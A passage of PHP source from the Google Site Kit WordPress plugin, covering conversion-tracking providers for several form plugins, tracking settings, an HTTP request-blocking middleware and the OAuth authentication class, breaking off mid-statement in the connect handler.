Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\PopupMaker * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling PopupMaker conversion events. * * @since 1.127.0 * @access private * @ignore */ class PopupMaker extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'popup-maker'; /** * Checks if the PopupMaker plugin is active. * * @since 1.127.0 * * @return bool True if PopupMaker is active, false otherwise. */ public function is_active() { return defined( 'POPMAKE_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'submit_lead_form' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-popup-maker.js' ), 'dependencies' => array( 'popup-maker-site' ), 'execution' => 'defer', ) ); $script->register( $this->context ); return $script; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\WPForms * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling WPForms conversion events. * * @since 1.127.0 * @access private * @ignore */ class WPForms extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'wpforms'; /** * Checks if the WPForms plugin is active. * * @since 1.127.0 * * @return bool True if WPForms is active, false otherwise. */ public function is_active() { return defined( 'WPFORMS_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'submit_lead_form' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-wpforms.js' ), 'execution' => 'defer', ) ); $script->register( $this->context ); return $script; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Ninja_Forms * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling Ninja Forms conversion events. * * @since 1.130.0 * @access private * @ignore */ class Ninja_Forms extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'ninja-forms'; /** * Checks if the Ninja Forms plugin is active. * * @since 1.130.0 * * @return bool True if Ninja Forms is active, false otherwise. */ public function is_active() { return defined( 'NF_PLUGIN_URL' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.130.0 * * @return array List of event names. */ public function get_event_names() { return array( 'submit_lead_form' ); } /** * Registers the script for the provider. * * @since 1.130.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-ninja-forms.js' ), 'execution' => 'defer', 'dependencies' => array( 'backbone' ), ) ); $script->register( $this->context ); return $script; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Contact_Form_7 * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling Contact Form 7 conversion events. * * @since 1.127.0 * @access private * @ignore */ class Contact_Form_7 extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'contact-form-7'; /** * Checks if the Contact Form 7 plugin is active. * * @since 1.127.0 * * @return bool True if Contact Form 7 is active, false otherwise. */ public function is_active() { return defined( 'WPCF7_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'contact' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-contact-form-7.js' ), 'execution' => 'defer', ) ); $script->register( $this->context ); return $script; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking * * @package Google\Site_Kit\Core\Modules * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Contact_Form_7; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Easy_Digital_Downloads; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Mailchimp; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Ninja_Forms; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\OptinMonster; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\PopupMaker; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\WooCommerce; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\WPForms; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Tags\GTag; use Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait; use Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics; use Google\Site_Kit\Core\Util\Feature_Flags; use LogicException; /** * Class for managing conversion tracking. * * @since 1.126.0 * @access private * @ignore */ class Conversion_Tracking implements Provides_Feature_Metrics { use Feature_Metrics_Trait; /** * Context object. * * @var Context */ private $context; /** * Conversion_Tracking_Settings instance. * * @since 1.127.0 * @var Conversion_Tracking_Settings */ protected $conversion_tracking_settings; /** * REST_Conversion_Tracking_Controller instance. * * @since 1.127.0 * @var REST_Conversion_Tracking_Controller */ protected $rest_conversion_tracking_controller; /** * Supported conversion event providers. * * @since 1.126.0 * @since 1.130.0 Added Ninja Forms class. * @var array */ public static $providers = array( Contact_Form_7::CONVERSION_EVENT_PROVIDER_SLUG => Contact_Form_7::class, Easy_Digital_Downloads::CONVERSION_EVENT_PROVIDER_SLUG => Easy_Digital_Downloads::class, Mailchimp::CONVERSION_EVENT_PROVIDER_SLUG => Mailchimp::class, Ninja_Forms::CONVERSION_EVENT_PROVIDER_SLUG => Ninja_Forms::class, OptinMonster::CONVERSION_EVENT_PROVIDER_SLUG => OptinMonster::class, PopupMaker::CONVERSION_EVENT_PROVIDER_SLUG => PopupMaker::class, WooCommerce::CONVERSION_EVENT_PROVIDER_SLUG => WooCommerce::class, WPForms::CONVERSION_EVENT_PROVIDER_SLUG => WPForms::class, ); /** * Constructor. * * @since 1.126.0 * * @param Context $context Plugin context. * @param Options $options Optional. Option API instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $options = $options ?: new Options( $context ); $this->conversion_tracking_settings = new Conversion_Tracking_Settings( $options ); $this->rest_conversion_tracking_controller = new REST_Conversion_Tracking_Controller( $this->conversion_tracking_settings ); } /** * Registers the class functionality. * * @since 1.126.0 */ public function register() { $this->conversion_tracking_settings->register(); $this->rest_conversion_tracking_controller->register(); $this->register_feature_metrics(); add_action( 'wp_enqueue_scripts', fn () => $this->maybe_enqueue_scripts(), 30 ); $active_providers = $this->get_active_providers(); array_walk( $active_providers, function ( Conversion_Events_Provider $active_provider ) { $active_provider->register_hooks(); } ); } /** * Enqueues conversion tracking scripts if conditions are satisfied. */ protected function maybe_enqueue_scripts() { if ( // Do nothing if neither Ads nor Analytics *web* snippet has been inserted. ! ( did_action( 'googlesitekit_ads_init_tag' ) || did_action( 'googlesitekit_analytics-4_init_tag' ) ) || ! $this->conversion_tracking_settings->is_conversion_tracking_enabled() ) { return; } $active_providers = $this->get_active_providers(); array_walk( $active_providers, function ( Conversion_Events_Provider $active_provider ) { $script_asset = $active_provider->register_script(); if ( $script_asset instanceof Script ) { $script_asset->enqueue(); } } ); $gtag_event = ' window._googlesitekit = window._googlesitekit || {}; window._googlesitekit.throttledEvents = []; window._googlesitekit.gtagEvent = (name, data) => { var key = JSON.stringify( { name, data } ); if ( !! window._googlesitekit.throttledEvents[ key ] ) { return; } window._googlesitekit.throttledEvents[ key ] = true; setTimeout( () => { delete window._googlesitekit.throttledEvents[ key ]; }, 5 ); gtag( "event", name, { ...data, event_source: "site-kit" } ); }; '; if ( function_exists( 'edd_get_currency' ) ) { $gtag_event .= "window._googlesitekit.easyDigitalDownloadsCurrency = '" . edd_get_currency() . "';"; } if ( Feature_Flags::enabled( 'gtagUserData' ) ) { $gtag_event .= 'window._googlesitekit.gtagUserData = true;'; } wp_add_inline_script( GTag::HANDLE, preg_replace( '/\s+/', ' ', $gtag_event ) ); } /** * Gets the instances of active conversion event providers. * * @since 1.126.0 * * @return array List of active Conversion_Events_Provider instances. * @throws LogicException Thrown if an invalid conversion event provider class name is provided. */ public function get_active_providers() { $active_providers = array(); foreach ( self::$providers as $provider_slug => $provider_class ) { if ( ! is_string( $provider_class ) || ! $provider_class ) { throw new LogicException( sprintf( /* translators: %s: provider slug */ __( 'A conversion event provider class name is required to instantiate a provider: %s', 'google-site-kit' ), $provider_slug ) ); } if ( ! class_exists( $provider_class ) ) { throw new LogicException( sprintf( /* translators: %s: provider classname */ __( "The '%s' class does not exist", 'google-site-kit' ), $provider_class ) ); } if ( ! is_subclass_of( $provider_class, Conversion_Events_Provider::class ) ) { throw new LogicException( sprintf( /* translators: 1: provider classname 2: Conversion_Events_Provider classname */ __( "The '%1\$s' class must extend the base conversion event provider class: %2\$s", 'google-site-kit' ), $provider_class, Conversion_Events_Provider::class ) ); } $instance = new $provider_class( $this->context ); if ( $instance->is_active() ) { $active_providers[ $provider_slug ] = $instance; } } return $active_providers; } /** * Returns events supported by active providers from the conversion tracking infrastructure. * * @since 1.163.0 Moved this method here from the Ads class. * * @return array Array of supported conversion events, or empty array. */ public function get_supported_conversion_events() { $providers = $this->get_active_providers(); if ( empty( $providers ) ) { return array(); } $events = array(); foreach ( $providers as $provider ) { $events = array_merge( $events, array_values( $provider->get_event_names() ) ); } return array_unique( $events ); } /** * Returns enhanced conversion events supported by active providers from the conversion tracking infrastructure. * * @since 1.165.0 * * @return array Array of supported enhanced conversion events, or empty array. */ public function get_enhanced_conversion_events() { $providers = $this->get_active_providers(); if ( empty( $providers ) ) { return array(); } $events = array(); foreach ( $providers as $provider ) { $supported_enhanced_events = array_intersect( $provider->get_enhanced_event_names(), $provider->get_event_names() ); $events = array_merge( $events, array_values( $supported_enhanced_events ) ); } return array_unique( $events ); } /** * Gets an array of internal feature metrics. * * @since 1.163.0 * * @return array */ public function get_feature_metrics() { return array( 'conversion_tracking_enabled' => $this->conversion_tracking_settings->is_conversion_tracking_enabled(), 'conversion_tracking_providers' => array_keys( $this->get_active_providers() ), 'conversion_tracking_events' => $this->get_supported_conversion_events(), 'conversion_tracking_events_enh' => $this->get_enhanced_conversion_events(), ); } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Tracking_Settings * * @package Google\Site_Kit\Core\Conversion_Tracking * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking; use Google\Site_Kit\Core\Storage\Setting; /** * Class to store conversion tracking settings. * * @since 1.127.0 * @access private * @ignore */ class Conversion_Tracking_Settings extends Setting { /** * The option name for this setting. */ const OPTION = 'googlesitekit_conversion_tracking'; /** * Gets the expected value type. * * @since 1.127.0 * * @return string The expected type of the setting option. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.127.0 * * @return array The default value. */ protected function get_default() { return array( 'enabled' => false, ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.127.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $value ) { $new_value = $this->get(); if ( isset( $value['enabled'] ) ) { $new_value['enabled'] = (bool) $value['enabled']; } return $new_value; }; } /** * Accessor for the `enabled` setting. * * @since 1.127.0 * * @return bool TRUE if conversion tracking is enabled, otherwise FALSE. */ public function is_conversion_tracking_enabled() { return $this->get()['enabled']; } } <?php /** * Class Google\Site_Kit\Core\HTTP\Middleware * * @package Google\Site_Kit * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\HTTP; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use WP_Http; /** * Guzzle Middleware. * * @since 1.159.0 */ class Middleware { /** * Middleware for blocking external requests using WordPress block_request. * * @since 1.159.0 * * @return callable Returns a function that blocks external requests using WordPress block_request. */ public static function block_external_request() { return static function ( callable $handler ) { return function ( $request, $options ) use ( $handler ) { $uri = $request->getUri(); $wp_http = new WP_Http(); if ( $wp_http->block_request( $uri ) ) { throw new RequestException( __( 'User has blocked requests through HTTP.', 'default' ), $request ); } return $handler( $request, $options ); }; }; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Connected_Proxy_URL * * @package Google\Site_Kit\Core\Authentication * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Core\Storage\Setting; /** * Connected_Proxy_URL class. * * @since 1.17.0 * @access private * @ignore */ class Connected_Proxy_URL extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_connected_proxy_url'; /** * Matches provided URL with the current proxy URL in the settings. * * @since 1.17.0 * * @param string $url URL to match against the current one in the settings. * @return bool TRUE if URL matches the current one, otherwise FALSE. */ public function matches_url( $url ) { $sanitize = $this->get_sanitize_callback(); $normalized = $sanitize( $url ); return $normalized === $this->get(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.17.0 * * @return callable A sanitizing function. */ protected function get_sanitize_callback() { return 'trailingslashit'; } } <?php /** * Class Google\Site_Kit\Core\Authentication\Authentication * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Storage\Encrypted_Options; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Admin\Notice; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\User_Input\User_Input; use Google\Site_Kit\Plugin; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Util\BC_Functions; use Google\Site_Kit\Core\Util\URL; use Google\Site_Kit\Core\Util\Auto_Updates; use Google\Site_Kit\Core\Authentication\REST_Authentication_Controller; use Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait; use Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics; /** * Authentication Class. * * @since 1.0.0 * @access private * @ignore */ final class Authentication implements Provides_Feature_Metrics { use Method_Proxy_Trait; use Feature_Metrics_Trait; const ACTION_CONNECT = 'googlesitekit_connect'; const ACTION_DISCONNECT = 'googlesitekit_disconnect'; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Options object. * * @since 1.0.0 * * @var Options */ private $options = null; /** * User_Options object. * * @since 1.0.0 * * @var User_Options */ private $user_options = null; /** * User_Input * * @since 1.90.0 * * @var User_Input */ private $user_input = null; /** * Transients object. * * @since 1.0.0 * * @var Transients */ private $transients = null; /** * Modules object. * * @since 1.70.0 * * @var Modules */ private $modules = null; /** * OAuth client object. * * @since 1.0.0 * * @var Clients\OAuth_Client */ private $auth_client = null; /** * OAuth credentials instance. * * @since 1.0.0 * @var Credentials */ protected $credentials; /** * Verification instance. * * @since 1.0.0 * @var Verification */ protected $verification; /** * Verification meta instance. * * @since 1.1.0 * @var Verification_Meta */ protected $verification_meta; /** * Verification file instance. * * @since 1.1.0 * @var Verification_File */ protected $verification_file; /** * Profile instance. * * @since 1.0.0 * @var Profile */ protected $profile; /** * Token instance. * * @since 1.39.0 * @var Token */ protected $token; /** * Owner_ID instance. * * @since 1.16.0 * @var Owner_ID */ protected $owner_id; /** * Has_Connected_Admins instance. * * @since 1.14.0 * @var Has_Connected_Admins */ protected $has_connected_admins; /** * Has_Multiple_Admins instance. * * @since 1.29.0 * @var Has_Multiple_Admins */ protected $has_multiple_admins; /** * Connected_Proxy_URL instance. * * @since 1.17.0 * @var Connected_Proxy_URL */ protected $connected_proxy_url; /** * Disconnected_Reason instance. * * @since 1.17.0 * @var Disconnected_Reason */ protected $disconnected_reason; /** * Google_Proxy instance. * * @since 1.1.2 * @var Google_Proxy */ protected $google_proxy; /** * Initial_Version instance. * * @since 1.25.0 * @var Initial_Version */ protected $initial_version; /** * Flag set when site fields are synchronized during the current request. * * @var bool */ private $did_sync_fields; /** * REST_Authentication_controller instance. * * @since 1.131.0 * @var REST_Authentication_Controller */ protected $rest_authentication_controller; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Options $options Optional. Option API instance. Default is a new instance. * @param User_Options $user_options Optional. User Option API instance. Default is a new instance. * @param Transients $transients Optional. Transient API instance. Default is a new instance. * @param User_Input $user_input Optional. User_Input instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null, ?Transients $transients = null, ?User_Input $user_input = null ) { $this->context = $context; $this->options = $options ?: new Options( $this->context ); $this->user_options = $user_options ?: new User_Options( $this->context ); $this->transients = $transients ?: new Transients( $this->context ); $this->modules = new Modules( $this->context, $this->options, $this->user_options, $this ); $this->user_input = $user_input ?: new User_Input( $context, $this->options, $this->user_options ); $this->google_proxy = new Google_Proxy( $this->context ); $this->credentials = new Credentials( new Encrypted_Options( $this->options ) ); $this->verification = new Verification( $this->user_options ); $this->verification_meta = new Verification_Meta( $this->user_options ); $this->verification_file = new Verification_File( $this->user_options ); $this->profile = new Profile( $this->user_options ); $this->token = new Token( $this->user_options ); $this->owner_id = new Owner_ID( $this->options ); $this->has_connected_admins = new Has_Connected_Admins( $this->options, $this->user_options ); $this->has_multiple_admins = new Has_Multiple_Admins( $this->transients ); $this->connected_proxy_url = new Connected_Proxy_URL( $this->options ); $this->disconnected_reason = new Disconnected_Reason( $this->user_options ); $this->initial_version = new Initial_Version( $this->user_options ); $this->rest_authentication_controller = new REST_Authentication_Controller( $this ); } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { $this->credentials()->register(); $this->verification()->register(); $this->verification_file()->register(); $this->verification_meta()->register(); $this->has_connected_admins->register(); $this->has_multiple_admins->register(); $this->owner_id->register(); $this->connected_proxy_url->register(); $this->disconnected_reason->register(); $this->initial_version->register(); $this->rest_authentication_controller->register(); $this->register_feature_metrics(); add_filter( 'allowed_redirect_hosts', $this->get_method_proxy( 'allowed_redirect_hosts' ) ); add_filter( 'googlesitekit_admin_data', $this->get_method_proxy( 'inline_js_admin_data' ) ); add_filter( 'googlesitekit_admin_notices', $this->get_method_proxy( 'authentication_admin_notices' ) ); add_filter( 'googlesitekit_inline_base_data', $this->get_method_proxy( 'inline_js_base_data' ) ); add_filter( 'googlesitekit_setup_data', $this->get_method_proxy( 'inline_js_setup_data' ) ); add_action( 'admin_init', $this->get_method_proxy( 'handle_oauth' ) ); add_action( 'admin_init', $this->get_method_proxy( 'check_connected_proxy_url' ) ); add_action( 'admin_action_' . self::ACTION_CONNECT, $this->get_method_proxy( 'handle_connect' ) ); add_action( 'admin_action_' . self::ACTION_DISCONNECT, $this->get_method_proxy( 'handle_disconnect' ) ); add_action( 'admin_action_' . Google_Proxy::ACTION_PERMISSIONS, function () { $this->handle_proxy_permissions(); } ); add_action( 'googlesitekit_authorize_user', function () { if ( ! $this->credentials->using_proxy() ) { return; } $this->set_connected_proxy_url(); }, 10, 3 ); add_filter( 'googlesitekit_user_data', function ( $user ) { if ( $this->profile->has() ) { $profile_data = $this->profile->get(); $user['user']['email'] = $profile_data['email']; $user['user']['picture'] = $profile_data['photo']; // Older versions of Site Kit (before 1.86.0) did not // fetch the user's full name, so we need to check for // that attribute before using it. $user['user']['full_name'] = isset( $profile_data['full_name'] ) ? $profile_data['full_name'] : null; } $user['connectURL'] = esc_url_raw( $this->get_connect_url() ); $user['initialVersion'] = $this->initial_version->get(); $user['isUserInputCompleted'] = ! $this->user_input->are_settings_empty(); $user['verified'] = $this->verification->has(); return $user; } ); add_filter( 'googlesitekit_inline_tracking_data', $this->get_method_proxy( 'inline_js_tracking_data' ) ); // Synchronize site fields on shutdown when select options change. $option_updated = function () { $sync_site_fields = function () { if ( $this->did_sync_fields ) { return; } // This method should run no more than once per request. $this->did_sync_fields = true; if ( $this->credentials->using_proxy() ) { $this->google_proxy->sync_site_fields( $this->credentials() ); } }; add_action( 'shutdown', $sync_site_fields ); }; add_action( 'update_option_blogname', $option_updated ); add_action( 'update_option_googlesitekit_db_version', $option_updated ); add_action( OAuth_Client::CRON_REFRESH_PROFILE_DATA, function ( $user_id ) { $this->cron_refresh_profile_data( $user_id ); } ); // If no initial version set for the current user, set it when getting a new access token. if ( ! $this->initial_version->get() ) { $set_initial_version = function () { $this->initial_version->set( GOOGLESITEKIT_VERSION ); }; add_action( 'googlesitekit_authorize_user', $set_initial_version ); add_action( 'googlesitekit_reauthorize_user', $set_initial_version ); } add_action( 'current_screen', function ( $current_screen ) { $this->maybe_refresh_token_for_screen( $current_screen->id ); } ); add_action( 'heartbeat_tick', function ( $response, $screen_id ) { $this->maybe_refresh_token_for_screen( $screen_id ); }, 10, 2 ); // Regularly synchronize Google profile data. add_action( 'googlesitekit_reauthorize_user', function () { if ( ! $this->profile->has() ) { return; } $profile_data = $this->profile->get(); if ( ! isset( $profile_data['last_updated'] ) || time() - $profile_data['last_updated'] > DAY_IN_SECONDS ) { $this->get_oauth_client()->refresh_profile_data( 30 * MINUTE_IN_SECONDS ); } } ); } /** * Gets the OAuth credentials object. * * @since 1.0.0 * * @return Credentials Credentials instance. */ public function credentials() { return $this->credentials; } /** * Gets the verification instance. * * @since 1.0.0 * * @return Verification Verification instance. */ public function verification() { return $this->verification; } /** * Gets the verification tag instance. * * @since 1.0.0 * @deprecated 1.1.0 * * @return Verification_Meta Verification tag instance. */ public function verification_tag() { _deprecated_function( __METHOD__, '1.1.0', __CLASS__ . '::verification_meta()' ); return $this->verification_meta; } /** * Gets the verification meta instance. * * @since 1.1.0 * * @return Verification_Meta Verification tag instance. */ public function verification_meta() { return $this->verification_meta; } /** * Gets the verification file instance. * * @since 1.1.0 * * @return Verification_File Verification file instance. */ public function verification_file() { return $this->verification_file; } /** * Gets the Profile instance. * * @since 1.0.0 * * @return Profile Profile instance. */ public function profile() { return $this->profile; } /** * Gets the Token instance. * * @since 1.39.0 * * @return Token Token instance. */ public function token() { return $this->token; } /** * Gets the OAuth client instance. * * @since 1.0.0 * * @return Clients\OAuth_Client OAuth client instance. */ public function get_oauth_client() { if ( ! $this->auth_client instanceof OAuth_Client ) { $this->auth_client = new OAuth_Client( $this->context, $this->options, $this->user_options, $this->credentials, $this->google_proxy, $this->profile, $this->token, $this->transients ); } return $this->auth_client; } /** * Gets the Google Proxy instance. * * @since 1.19.0 * * @return Google_Proxy An instance of Google Proxy. */ public function get_google_proxy() { return $this->google_proxy; } /** * Revokes authentication along with user options settings. * * @since 1.0.0 */ public function disconnect() { global $wpdb; // Revoke token via API call. $this->get_oauth_client()->revoke_token(); // Delete all user data. $user_id = $this->user_options->get_user_id(); $prefix = $this->user_options->get_meta_key( 'googlesitekit\_%' ); // Reset Has_Connected_Admins setting. $this->has_connected_admins->delete(); // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( "DELETE FROM $wpdb->usermeta WHERE user_id = %d AND meta_key LIKE %s", $user_id, $prefix ) ); wp_cache_delete( $user_id, 'user_meta' ); } /** * Gets the URL for connecting to Site Kit. * * @since 1.0.0 * @since 1.32.0 Updated to use dedicated action URL. * * @return string Connect URL. */ public function get_connect_url() { return add_query_arg( array( 'action' => self::ACTION_CONNECT, 'nonce' => wp_create_nonce( self::ACTION_CONNECT ), ), admin_url( 'index.php' ) ); } /** * Gets the URL for disconnecting from Site Kit. * * @since 1.0.0 * @since 1.32.0 Updated to use dedicated action URL. * * @return string Disconnect URL. */ public function get_disconnect_url() { return add_query_arg( array( 'action' => self::ACTION_DISCONNECT, 'nonce' => wp_create_nonce( self::ACTION_DISCONNECT ), ), admin_url( 'index.php' ) ); } /** * Check if the current user is authenticated. * * @since 1.0.0 * * @return boolean True if the user is authenticated, false otherwise. */ public function is_authenticated() { return $this->token->has(); } /** * Checks whether the Site Kit setup is considered complete. * * If this is not the case, most permissions will be force-prevented to ensure that only permissions required for * initial setup are granted. * * @since 1.0.0 * @since 1.7.0 Moved from `Permissions` class. * * @return bool True if setup is completed, false otherwise. */ public function is_setup_completed() { if ( ! $this->credentials->has() ) { return false; } /** * Filters whether the Site Kit plugin should consider its setup to be completed. * * This can be used by essential auto-activated modules to amend the result of this check. * * @since 1.0.0 * * @param bool $complete Whether the setup is completed. */ return (bool) apply_filters( 'googlesitekit_setup_complete', true ); } /** * Refreshes user profile data in the background. * * @since 1.13.0 * * @param int $user_id User ID to refresh profile data for. */ private function cron_refresh_profile_data( $user_id ) { $original_user_id = $this->user_options->get_user_id(); $this->user_options->switch_user( $user_id ); if ( $this->is_authenticated() ) { $this->get_oauth_client()->refresh_profile_data( 30 * MINUTE_IN_SECONDS ); } $this->user_options->switch_user( $original_user_id ); } /** * Proactively refreshes the current user's OAuth token when on the * Site Kit Plugin Dashboard screen. * * Also refreshes the module owner's OAuth token for all shareable modules * the current user can read shared data for. * * @since 1.42.0 * @since 1.70.0 Moved the closure within regiser() to this method. * * @param string $screen_id The unique ID of the current WP_Screen. * * @return void */ private function maybe_refresh_token_for_screen( $screen_id ) { if ( 'dashboard' !== $screen_id && 'toplevel_page_googlesitekit-dashboard' !== $screen_id ) { return; } $this->refresh_shared_module_owner_tokens(); if ( ! current_user_can( Permissions::AUTHENTICATE ) || ! $this->credentials()->has() ) { return; } $this->refresh_user_token(); } /** * Proactively refreshes the module owner's OAuth token for all shareable * modules the current user can read shared data for. * * @since 1.70.0 * * @return void */ private function refresh_shared_module_owner_tokens() { $shareable_modules = $this->modules->get_shareable_modules(); foreach ( $shareable_modules as $module_slug => $module ) { if ( ! current_user_can( Permissions::READ_SHARED_MODULE_DATA, $module_slug ) ) { continue; } $owner_id = $module->get_owner_id(); if ( ! $owner_id ) { continue; } $restore_user = $this->user_options->switch_user( $owner_id ); $this->refresh_user_token(); $restore_user(); } } /** * Proactively refreshes the current user's OAuth token. * * @since 1.70.0 * * @return void */ private function refresh_user_token() { $token = $this->token->get(); // Do nothing if the token is not set. if ( empty( $token['created'] ) || empty( $token['expires_in'] ) ) { return; } // Do nothing if the token expires in more than 5 minutes. if ( $token['created'] + $token['expires_in'] > time() + 5 * MINUTE_IN_SECONDS ) { return; } $this->get_oauth_client()->refresh_token(); } /** * Accessible method to call refresh_user_token() for classes using Authentication. * * @since 1.131.0 * * @return void */ public function do_refresh_user_token() { $this->refresh_user_token(); } /** * Handles receiving a temporary OAuth code. * * @since 1.0.0 * @since 1.32.0 Moved connect and disconnect actions to dedicated handlers. */ private function handle_oauth() { if ( defined( 'WP_CLI' ) && WP_CLI ) { return; } // Handles Direct OAuth client request. if ( $this->context->input()->filter( INPUT_GET, 'oauth2callback' ) ) { if ( ! current_user_can( Permissions::AUTHENTICATE ) ) { wp_die( esc_html__( 'You don’t have permissions to authenticate with Site Kit.', 'google-site-kit' ), 403 ); } $this->get_oauth_client()->authorize_user(); } } /** * Handles request to connect via oAuth. * * @since 1.32.0 */ private function handle_connect() { $input = $this->context->input(); $nonce = $input->filter( INPUT_GET, 'nonce' ); if ( ! wp_verify_nonce( $nonce, self::ACTION_CONNECT ) ) { $this->invalid_nonce_error( self::ACTION_CONNECT ); } if ( ! current_user_can( Permissions::AUTHENTICATE ) ) { wp_die( esc_html__( 'You don’t have permissions to authenticate with Site Kit.', 'google-site-kit' ), 403 ); } $redirect_url = $input->filter( INPUT_GET, 'redirect', 